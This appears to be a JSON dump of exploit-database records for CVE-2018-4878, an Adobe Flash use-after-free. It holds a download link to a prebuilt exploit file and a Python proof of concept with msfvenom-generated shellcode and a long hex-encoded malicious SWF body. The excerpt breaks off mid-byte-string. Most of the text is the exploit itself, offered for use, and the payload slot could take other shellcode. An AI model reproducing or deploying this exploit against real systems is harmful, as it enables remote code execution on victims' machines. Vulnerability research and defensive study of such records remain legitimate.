"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-13T00:00:00", "title": "Flash ActiveX 28.0.0.137 - Code Execution (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2016-02-13T00:00:00", "id": "EXPLOITPACK:D16BF29892ADBD1FE8B1E6E0A3DED407", "href": "", "sourceData": "## CVE-2018-4878 \n\nPop up a calculator - Requires Flash ActiveX 28.0.0.137\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44745.swf", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:01", "description": "\nAdobe Flash 28.0.0.161 - Use-After-Free", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-06T00:00:00", "title": "Adobe Flash 28.0.0.161 - Use-After-Free", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4878"], "modified": "2018-04-06T00:00:00", "id": "EXPLOITPACK:3AE76F8EB91746556D3EB11E9FF64F66", "href": "", "sourceData": "#!/usr/bin/env python\n# coding: UTF-8\nimport BaseHTTPServer\nimport sys\nfrom SimpleHTTPServer import SimpleHTTPRequestHandler\n\nprint \"@Syfi2k\"\nprint \"[+] CVE-2018-4878 poc \"\nprint \"--------------------------------\"\nprint \"Calc.exe Shellcode via Msfvenom\"\nprint \"Based on fixed version https://github.com/anbai-inc/CVE-2018-4878\"\nprint \"No Crash without executing the Shellcode, Sandbox? try it yourself\"\n\n\nbuf = \"\"\nbuf += \"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\nbuf += \"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\nbuf += \"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\nbuf += \"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\nbuf += \"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\nbuf += \"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\nbuf += \"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\nbuf += \"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\nbuf += \"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\nbuf += \"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\nbuf += \"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\nbuf += \"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\nbuf += \"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\nbuf += \"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\nbuf += \"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\n \npayload = buf\ndata = \"\"\nflash_name = \"movie\"\n \n\n\ndata = \"\\x46\\x57\\x53\\x20\\xE3\\x45\\x00\\x00\\x78\\x00\\x04\\xE2\\x00\\x00\\x0E\\xA6\\x00\\x00\\x18\\x01\\x00\\x44\\x11\\x19\\x00\\x00\\x00\\x7F\\x13\\x1F\\x02\\x00\\x00\\x3C\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x72\\x64\\x66\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x77\\x33\\x2E\\x6F\\x72\\x67\\x2F\\x31\\x39\\x39\\x39\\x2F\\x30\\x32\\x2F\\x32\\x32\\x2D\\x72\\x64\\x66\\x2D\\x73\\x79\\x6E\\x74\\x61\\x78\\x2D\\x6E\\x73\\x23\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x20\\x78\\x6D\\x6C\\x6E\\x73\\x3A\\x64\\x63\\x3D\\x22\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x70\\x75\\x72\\x6C\\x2E\\x6F\\x72\\x67\\x2F\\x64\\x63\\x2F\\x65\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x73\\x2F\\x31\\x2E\\x31\\x22\\x20\\x72\\x64\\x66\\x3A\\x61\\x62\\x6F\\x75\\x74\\x3D\\x22\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x78\\x2D\\x73\\x68\\x6F\\x63\\x6B\\x77\\x61\\x76\\x65\\x2D\\x66\\x6C\\x61\\x73\\x68\\x3C\\x2F\\x64\\x63\\x3A\\x66\\x6F\\x72\\x6D\\x61\\x74\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x41\\x64\\x6F\\x62\\x65\\x20\\x46\\x6C\\x65\\x78\\x20\\x34\\x20\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x74\\x69\\x74\\x6C\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x70\\x72\\x6F\\x64\\x75\\x63\\x74\\x73\\x2F\\x66\\x6C\\x65\\x78\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x70\\x75\\x62\\x6C\\x69\\x73\\x68\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x75\\x6E\\x6B\\x6E\\x6F\\x77\\x6E\\x3C\\x2F\\x64\\x63\\x3A\\x63\\x72\\x65\\x61\\x74\\x6F\\x72\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x45\\x4E\\x3C\\x2F\\x64\\x63\\x3A\\x6C\\x61\\x6E\\x67\\x75\\x61\\x67\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x3C\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x46\\x65\\x62\\x20\\x36\\x2C\\x20\\x32\\x30\\x31\\x38\\x3C\\x2F\\x64\\x63\\x3A\\x64\\x61\\x74\\x65\\x3E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x44\\x65\\x73\\x63\\x72\\x69\\x70\\x74\\x69\\x6F\\x6E\\x3E\\x20\\x3C\\x2F\\x72\\x64\\x66\\x3A\\x52\\x44\\x46\\x3E\\x0D\\x0A\\x00\\xD0\\x0F\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x10\\xE8\\x03\\x3C\\x00\\x43\\x02\\xFF\\xFF\\xFF\\xC8\\x0A\\x66\\x6C\\x61\\x73\\x68\\x30\\x32\\x00\\xFF\\x15\\x82\\x0B\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\"\n \n\nfiller = 2940 - len(payload)\n \ndata = data + payload + \"\\x90\" * filler\n\n\ndata = data + \"\\x13\\x0E\\x01\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\xBF\\x14\\xB6\\x06\\x00\\x00\\x01\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x10\\x00\\x2E\\x00\\x02\\x00\\x28\\x8E\\xCD\\xBD\\x06\\xAD\\xCA\\x75\\x8F\\xCD\\xBD\\x06\\xAE\\xE4\\xE0\\x03\\x8E\\xCD\\xBD\\x06\\xFC\\xE2\\x75\\x8E\\xCD\\xBD\\x06\\xFE\\xF0\\x75\\x8E\\xCD\\xBD\\x06\\xF8\\xF8\\x75\\x8F\\xCD\\xBD\\x06\\xF9\\xFE\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF8\\xDE\\x75\\x89\\xCD\\xBD\\x06\\xDC\\xB6\\xCD\\x02\\xD6\\xF6\\x68\\x8F\\xCD\\xBD\\x06\\xFA\\xE6\\xCD\\x03\\x8F\\xCD\\xBD\\x06\\xF5\\xDC\\xA1\\x03\\x8E\\xCD\\xBD\\x06\\xF1\\xDC\\x74\\x8F\\xCD\\xBD\\x06\\xD1\\xBA\\xFD\\x02\\x8F\\xCD\\xBD\\x06\\xEC\\xDC\\xCD\\x03\\x8E\\xCD\\xBD\\x06\\xEF\\xE4\\x75\\x8E\\xCD\\xBD\\x06\\xEE\\xF8\\x75\\x8E\\xCD\\xBD\\x06\\xE9\\xF0\\x75\\x89\\xCD\\xBD\\x06\\xEE\\xE6\\xDD\\x03\\xFF\\xD0\\x69\\x8F\\xCD\\xBD\\x06\\xCB\\xAA\\xC9\\x02\\x93\\xCD\\xBD\\x06\\x00\\x55\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x05\\x76\\x61\\x72\\x5F\\x31\\x00\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x76\\x61\\x72\\x5F\\x32\\x0E\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x06\\x64\\x61\\x74\\x61\\x31\\x35\\x3C\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x31\\x2E\\x61\\x73\\x05\\x64\\x61\\x74\\x61\\x32\\x05\\x64\\x61\\x74\\x61\\x33\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x45\\x6E\\x64\\x69\\x61\\x6E\\x0D\\x4C\\x49\\x54\\x54\\x4C\\x45\\x5F\\x45\\x4E\\x44\\x49\\x41\\x4E\\x06\\x65\\x6E\\x64\\x69\\x61\\x6E\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x07\\x76\\x65\\x72\\x73\\x69\\x6F\\x6E\\x01\\x2C\\x01\\x20\\x07\\x72\\x65\\x70\\x6C\\x61\\x63\\x65\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x05\\x73\\x70\\x6C\\x69\\x74\\x05\\x41\\x72\\x72\\x61\\x79\\x0C\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2E\\x61\\x73\\x24\\x30\\x14\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x53\\x70\\x72\\x69\\x74\\x65\\x24\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1F\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x3A\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x1C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x3A\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x00\\x06\\x4E\\x75\\x6D\\x62\\x65\\x72\\x07\\x63\\x6C\\x61\\x73\\x73\\x5F\\x31\\x05\\x76\\x61\\x72\\x5F\\x33\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0A\\x69\\x73\\x44\\x65\\x62\\x75\\x67\\x67\\x65\\x72\\x05\\x76\\x61\\x72\\x5F\\x34\\x07\\x66\\x6C\\x61\\x73\\x68\\x31\\x30\\x05\\x76\\x61\\x72\\x5F\\x35\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x76\\x6F\\x69\\x64\\x05\\x43\\x6C\\x61\\x73\\x73\\x17\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x70\\x6F\\x73\\x03\\x33\\x36\\x34\\x03\\x34\\x36\\x33\\x03\\x34\\x39\\x38\\x03\\x35\\x33\\x37\\x03\\x31\\x39\\x39\\x03\\x32\\x32\\x39\\x03\\x69\\x6E\\x74\\x03\\x32\\x36\\x30\\x07\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x04\\x31\\x32\\x37\\x30\\x0D\\x66\\x6C\\x61\\x73\\x68\\x2E\\x64\\x69\\x73\\x70\\x6C\\x61\\x79\\x06\\x53\\x70\\x72\\x69\\x74\\x65\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x0F\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x65\\x76\\x65\\x6E\\x74\\x73\\x0D\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x11\\x49\\x6E\\x74\\x65\\x72\\x61\\x63\\x74\\x69\\x76\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x16\\x44\\x69\\x73\\x70\\x6C\\x61\\x79\\x4F\\x62\\x6A\\x65\\x63\\x74\\x43\\x6F\\x6E\\x74\\x61\\x69\\x6E\\x65\\x72\\x1C\\x5F\\x5F\\x67\\x6F\\x5F\\x74\\x6F\\x5F\\x63\\x74\\x6F\\x72\\x5F\\x64\\x65\\x66\\x69\\x6E\\x69\\x74\\x69\\x6F\\x6E\\x5F\\x68\\x65\\x6C\\x70\\x03\\x35\\x37\\x38\\x03\\x31\\x35\\x37\\x05\\x41\\x72\\x72\\x61\\x79\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x09\\x42\\x79\\x74\\x65\\x41\\x72\\x72\\x61\\x79\\x21\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x61\\x64\\x6F\\x62\\x65\\x2E\\x63\\x6F\\x6D\\x2F\\x41\\x53\\x33\\x2F\\x32\\x30\\x30\\x36\\x2F\\x62\\x75\\x69\\x6C\\x74\\x69\\x6E\\x09\\x77\\x72\\x69\\x74\\x65\\x42\\x79\\x74\\x65\\x08\\x74\\x6F\\x53\\x74\\x72\\x69\\x6E\\x67\\x00\\x06\\x4F\\x62\\x6A\\x65\\x63\\x74\\x06\\x53\\x74\\x72\\x69\\x6E\\x67\\x03\\x69\\x6E\\x74\\x04\\x06\\x07\\x06\\x07\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x32\\x06\\x6E\\x61\\x6D\\x65\\x5F\\x31\\x0D\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x08\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0C\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x0F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3A\\x66\\x6C\\x61\\x73\\x68\\x32\\x31\\x10\\x3A\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x2F\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x3E\\x05\\x01\\x16\\x03\\x16\\x0D\\x16\\x12\\x08\\x17\\x05\\x1A\\x17\\x03\\x18\\x01\\x1A\\x01\\x1A\\x1B\\x1A\\x1C\\x1A\\x1D\\x1A\\x1E\\x1A\\x1F\\x16\\x38\\x16\\x3C\\x17\\x4D\\x16\\x49\\x16\\x44\\x16\\x49\\x16\\x49\\x16\\x49\\x08\\x46\\x17\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x05\\x51\\x18\\x51\\x1A\\x51\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x16\\x49\\x06\\x0C\\x01\\x02\\x05\\x06\\x07\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x01\\x02\\x03\\x11\\x12\\x13\\x0C\\x01\\x12\\x17\\x06\\x18\\x08\\x09\\x0A\\x0B\\x0C\\x0D\\x0E\\x0C\\x12\\x17\\x18\\x0A\\x0B\\x0C\\x0D\\x0E\\x35\\x36\\x37\\x06\\x48\\x07\\x02\\x02\\x07\\x02\\x04\\x07\\x02\\x05\\x07\\x02\\x06\\x07\\x02\\x07\\x07\\x03\\x0C\\x07\\x03\\x0E\\x07\\x02\\x0F\\x07\\x02\\x10\\x07\\x02\\x08\\x07\\x04\\x11\\x07\\x02\\x13\\x07\\x05\\x16\\x07\\x05\\x18\\x07\\x02\\x19\\x1B\\x01\\x07\\x02\\x21\\x07\\x02\\x22\\x07\\x01\\x23\\x07\\x02\\x25\\x07\\x01\\x26\\x07\\x02\\x27\\x07\\x01\\x28\\x07\\x02\\x2A\\x07\\x02\\x2B\\x07\\x02\\x34\\x07\\x02\\x36\\x07\\x02\\x01\\x07\\x0F\\x39\\x09\\x01\\x02\\x07\\x02\\x3A\\x07\\x10\\x3B\\x07\\x0F\\x3D\\x07\\x0F\\x3E\\x07\\x0F\\x3F\\x1B\\x03\\x07\\x12\\x43\\x07\\x13\\x45\\x07\\x12\\x47\\x07\\x12\\x48\\x07\\x12\\x4A\\x07\\x12\\x4B\\x07\\x12\\x4C\\x07\\x12\\x4F\\x07\\x12\\x4E\\x07\\x12\\x36\\x07\\x12\\x2A\\x07\\x12\\x07\\x07\\x12\\x02\\x07\\x12\\x27\\x07\\x13\\x0E\\x07\\x12\\x0F\\x07\\x12\\x10\\x07\\x12\\x08\\x07\\x12\\x05\\x07\\x12\\x13\\x07\\x17\\x16\\x07\\x17\\x18\\x1B\\x04\\x07\\x12\\x21\\x07\\x12\\x22\\x07\\x12\\x04\\x07\\x12\\x50\\x07\\x12\\x01\\x07\\x12\\x52\\x07\\x12\\x2B\\x07\\x35\\x23\\x07\\x35\\x28\\x07\\x35\\x26\\x09\\x10\\x05\\x09\\x0F\\x05\\x05\\x00\\x00\\x49\\x00\\x00\\x00\\x49\\x00\\x00\\x18\\x53\\x00\\x00\\x00\\x54\\x00\\x00\\x00\\x49\\x00\\x0A\\x2C\\x01\\x2D\\x2E\\x2C\\x01\\x2D\\x2F\\x2C\\x01\\x2D\\x30\\x2C\\x01\\x2D\\x31\\x2C\\x01\\x2D\\x32\\x2C\\x01\\x2D\\x33\\x2C\\x01\\x2D\\x35\\x2C\\x01\\x2D\\x37\\x40\\x01\\x2D\\x41\\x2C\\x01\\x2D\\x42\\x01\\x40\\x1D\\x09\\x36\\x00\\x03\\x02\\x43\\x00\\x00\\x41\\x00\\x2E\\x01\\x00\\x02\\x04\\x02\\x31\\x00\\x01\\x19\\x00\\x30\\x00\\x02\\x06\\x00\\x02\\x01\\x01\\x40\\x04\\x01\\x00\\x00\\x00\\x05\\x00\\x01\\x01\\x01\\x02\\x03\\xD0\\x30\\x47\\x00\\x00\\x01\\x02\\x01\\x01\\x08\\x23\\xD0\\x30\\x65\\x00\\x60\\x29\\x30\\x60\\x20\\x30\\x60\\x21\\x30\\x60\\x22\\x30\\x60\\x23\\x30\\x60\\x1D\\x30\\x60\\x1D\\x58\\x00\\x1D\\x1D\\x1D\\x1D\\x1D\\x1D\\x68\\x40\\x47\\x00\\x00\\x02\\x01\\x01\\x0A\\x0B\\x03\\xD0\\x30\\x47\\x00\\x00\\x03\\x03\\x01\\x0A\\x0B\\x23\\xD0\\x30\\xD0\\x49\\x00\\x5D\\x30\\x5D\\x31\\x4A\\x31\\x00\\x60\\x06\\x87\\x61\\x30\\x60\\x30\\x60\\x07\\x66\\x47\\x61\\x46\\xD0\\x5D\\x41\\xD0\\x4A\\x41\\x01\\x61\\x43\\x47\\x00\\x00\\x04\\x02\\x01\\x09\\x0A\\x09\\xD0\\x30\\x5E\\x31\\x60\\x3F\\x61\\x31\\x47\\x00\\x00\\xBF\\x14\\xD7\\x09\\x00\\x00\\x01\\x00\\x00\\x00\\x55\\x41\\x46\\x47\\x65\\x6E\\x65\\x72\\x61\\x74\\x6F\\x72\\x00\\x10\\x00\\x2E\\x00\\x03\\xFF\\xFF\\xFF\\xFF\\x0F\\xFF\\xFF\\xFF\\xFF\\x0F\\x00\\x02\\x00\\x00\\xE0\\xFF\\xFF\\xFF\\xEF\\x41\\x79\\x01\\x01\\x00\\x3B\\x43\\x3A\\x5C\\x55\\x73\\x65\\x72\\x73\\x5C\\x4D\\x69\\x68\\x61\\x5C\\x41\\x64\\x6F\\x62\\x65\\x4D\\x69\\x6E\\x65\\x50\\x6F\\x43\\x5F\\x74\\x72\\x79\\x69\\x6E\\x67\\x54\\x6F\\x45\\x76\\x61\\x64\\x65\\x53\\x65\\x63\\x53\\x6F\\x6C\\x75\\x74\\x69\\x6F\\x6E\\x73\\x66\\x6C\\x61\\x30\\x2E\\x61\\x73\\x08\\x66\\x6C\\x61\\x73\\x68\\x30\\x24\\x30\\x06\\x70\\x61\\x72\\x61\\x6D\\x31\\x05\\x76\\x61\\x72\\x5F\\x31\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x32\\x0F\\x4C\\x6F\\x63\\x61\\x6C\\x43\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x69\\x6F\\x6E\\x09\\x66\\x6C\\x61\\x73\\x68\\x2E\\x6E\\x65\\x74\\x00\\x07\\x63\\x6F\\x6E\\x6E\\x65\\x63\\x74\\x05\\x45\\x72\\x72\\x6F\\x72\\x01\\x65\\x06\\x76\\x61\\x72\\x5F\\x31\\x33\\x07\\x44\\x52\\x4D\\x5F\\x6F\\x62\\x6A\\x05\\x54\\x69\\x6D\\x65\\x72\\x0B\\x66\\x6C\\x61\\x73\\x68\\x2E\\x75\\x74\\x69\\x6C\\x73\\x06\\x76\\x61\\x72\\x5F\\x31\\x34\\x00\\x08\\x6D\\x65\\x74\\x68\\x6F\\x64\\x5F\\x31\\x10\\x61\\x64\\x64\\x45\\x76\\x65\\x6E\\x74\\x4C\\x69\\x73\\x74\\x65\\x6E\\x65\\x72\\x05\\x73\\x74\\x61\\x72\\x74\\x07\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x0D\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x30\\x01\\x19\\x06\\x64\\x61\\x74\\x61\\x31\\x34\\x19\\x63\\x6F\\x6D\\x2E\\x61\\x64\\x6F\\x62\\x65\\x2E\\x74\\x76\\x73\\x64\\x6B\\x2E\\x6D\\x65\\x64\\x69\\x61\\x63\\x6F\\x72\\x65\\x04\\x50\\x53\\x44\\x4B\\x13\\x50\\x53\\x44\\x4B\\x45\\x76\\x65\\x6E\\x74\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x04\\x70\\x53\\x44\\x4B\\x10\\x63\\x72\\x65\\x61\\x74\\x65\\x44\\x69\\x73\\x70\\x61\\x74\\x63\\x68\\x65\\x72\\x11\\x63\\x72\\x65\\x61\\x74\\x65\\x4D\\x65\\x64\\x69\\x61\\x50\\x6C\\x61\\x79\\x65\\x72\\x06\\x76\\x61\\x72\\x5F\\x31\\x35\\x06\\x76\\x61\\x72\\x5F\\x31\\x36\\x0A\\x64\\x72\\x6D\\x4D\\x61\\x6E\\x61\\x67\\x65\\x72\\x0A\\x69\\x6E\\x69\\x74\\x69\\x61\\x6C\\x69\\x7A\\x65\\x0E\\x66\\x6C\\x61\\x73\\x68\\x30\\x2F\\x66\\x6C\\x61\\x73\\x68\\x32\\x32\\x04\\x76\\x6F\\x69\\x64\\x02\\x61\\x31\\x04\\x73\\x74\\x6F\\x70\\x0C\\x43\\x61\\x70\\x61\\x62\\x69\\x6C\\x69\\x74\\x69\\x65\\x73\\x0C\\x66\\x6C\\x61\\x73\\x68\\x2E\\x73\\x79\\x73\\x74\\x65\\x6D\\x0A\\x69\\x73\\x44